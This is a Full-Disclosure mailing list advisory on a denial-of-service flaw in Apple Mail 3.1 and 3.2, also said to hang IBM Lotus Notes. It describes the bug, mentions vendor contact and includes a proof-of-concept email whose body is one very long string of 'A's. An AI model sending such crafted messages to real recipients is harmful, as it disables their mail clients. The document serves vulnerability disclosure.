Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)

[David Wharton <security () davidwharton us>]

***Summary***

A maliciously crafted e-mail message can cause a denial of service in  
multiple versions of the Apple Mail email client.

***Scope***

Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)

Note: other versions of this product may be vulnerable as well; I have  
not tested them.  The vendor has been made aware of this issue and has  
chosen not to treat it as a security issue.

Interestingly enough, a similar issue seems to be present in multiple  
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z -- http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611) 
.  The exploit provided in this advisory will also cause a denial of  
service condition on multiple versions of IBM Lotus Notes.  IBM has  
been kind enough to create SPR# PRAD7DPKLW to address the issue the  
exploit targets.

***Description***

An email message with a maliciously crafted body (in my tests I used a  
long line) can cause the e-mail client to hang, resulting in a denial  
of service condition.  Testing with emails that do not have any  
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line  
consisting of 1.5 MB can cause the email clients to hang for over half  
an hour.

Initial testing reveals the following:

In Apple Mail, the e-mail is rendered correctly in the preview pane  
but a subsequent click on a different e-mail causes the application to  
hang.

***Credits***

David Wharton

***References***

Apple Mail
http://www.apple.com/macosx/features/mail.html

***PoC Exploit***

Below is a sample e-mail with headers (some headers removed or  
modified) that causes the e-mail clients to hang as discussed.  Note  
that the body is one long line and the "=" character is not part of;  
it is there for formatting but in reality most of the body is one long  
contiguous string of A's.

Subject: dos test
MIME-Version: 1.0
From: xxxxx () xxxxx com
To: xxxxx () xxxxx com
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx () xxxxx com>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
        charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx () xxxxx com
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@


<font  
size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</ 
font>N=
OTICE:  This e-mail message and all attachments transmitted with it  
may con=
tain confidential information intended solely for the use of the  
addressee.=
<br />=

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/